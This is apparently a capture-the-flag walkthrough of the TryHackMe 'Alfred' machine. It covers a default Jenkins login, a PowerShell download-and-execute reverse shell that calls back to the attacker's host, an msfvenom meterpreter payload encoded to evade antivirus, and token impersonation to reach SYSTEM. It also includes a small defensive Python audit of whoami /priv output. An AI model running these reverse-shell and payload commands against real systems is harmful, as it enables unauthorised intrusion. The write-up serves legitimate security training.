【THM】Alfred-Practice
hihopkc
Initial Access
```bash
nmap -p- -sC -sV -T4 10.10.206.74
```
```
Nmap scan report for 10.10.206.74
```
The login credentials are admin / admin.
The version is shown as Jenkins ver. 2.190.1.
Click the project, then click Configure.
Fill in:
```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.63.201:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.63.201 -Port 9001
```
Apply and save.
Success.
Switching Shells
To simplify privilege escalation, let's switch to a meterpreter shell using the following process.
```bash
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.63.201 LPORT=9001 -f exe -o shell-name.exe
```
This payload generates an encoded x86-64 reverse TCP meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious.
After creating this payload, download it to the target machine using the same method as in the previous step.
```powershell
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.63.201:8000/shell-name.exe','shell-name.exe')"
```
Before running the program, make sure a handler is set up in Metasploit.
```
use exploit/multi/handler
```
```powershell
Start-Process "shell-name.exe"
```
Privilege Escalation
Now that we have initial access, let's use token impersonation to gain SYSTEM access.
Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when the user logs in or is authenticated. This is usually done by LSASS.exe (think of this as the authentication process).
This access token consists of:
- User SIDs(security identifier)
- Group SIDs
- Privileges
Amongst other things. More detailed information can be found here.
There are two types of access tokens:
- Primary access tokens: those associated with a user account that are generated on log on
- Impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process
For an impersonation token, there are different levels:
- SecurityAnonymous: current user/client cannot impersonate another user/client
- SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
- SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
- SecurityDelegation: current user/client can impersonate the client’s security context on a remote system
Where the security context is a data structure that contains users’ relevant security information.
The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There’s more reading here.
Use whoami /priv to view all privileges.
```
C:\Program Files (x86)\Jenkins\workspace\project>whoami /priv
```
We can see privileges information. “enable” is an important detail for us.
You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.
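As an added example (not part of the original walkthrough), a small Python audit that parses a whoami /priv listing and reports which of the commonly abused privileges listed above the token holds, and which of them are enabled. SAMPLE_WHOAMI_PRIV is constructed to match the whoami /priv table layout and is not output captured from the Alfred box.

```python
# Added example: audit a whoami /priv listing for the commonly abused
# privileges named above. Sample output is constructed, not from the box.

# Privileges the walkthrough lists as the most commonly abused.
ABUSED_PRIVILEGES = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege", "SeDebugPrivilege",
}

# Constructed sample, modelled on the whoami /priv table layout
# (name, free-text description, state).
SAMPLE_WHOAMI_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Return {privilege: state}. The description column may contain spaces,
    so the name is the first whitespace field and the state is the last."""
    privs, in_table = {}, False
    for line in text.splitlines():
        if line.startswith("===="):  # separator row precedes the data rows
            in_table = True
            continue
        fields = line.split()
        if in_table and len(fields) >= 2:
            privs[fields[0]] = fields[-1]
    return privs


def present_abusable(text: str) -> list[str]:
    """Abusable privileges the token holds at all. A Disabled privilege is
    still held and can be re-enabled by the process, so presence is what
    matters when reviewing what a service account has been granted."""
    return sorted(p for p in parse_whoami_priv(text) if p in ABUSED_PRIVILEGES)


def enabled_abusable(text: str) -> list[str]:
    """Abusable privileges currently Enabled, the detail the walkthrough keys on."""
    privs = parse_whoami_priv(text)
    return [p for p in present_abusable(text) if privs[p] == "Enabled"]
```

Run against the output of whoami /priv from a service account (here, the Jenkins build user) to see which of these privileges it has been granted; removing them from the service account, or running the service under a less privileged account, is the mitigation.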
Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.
```
meterpreter > load incognito
```
To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available.
```
meterpreter > list_tokens -g
```
Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators’ token. What is the output when you run the getuid command?
```
meterpreter > impersonate_token "BUILTIN\Administrators"
```
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
```
meterpreter > migrate 668
```
```
meterpreter > search -f root.txt
```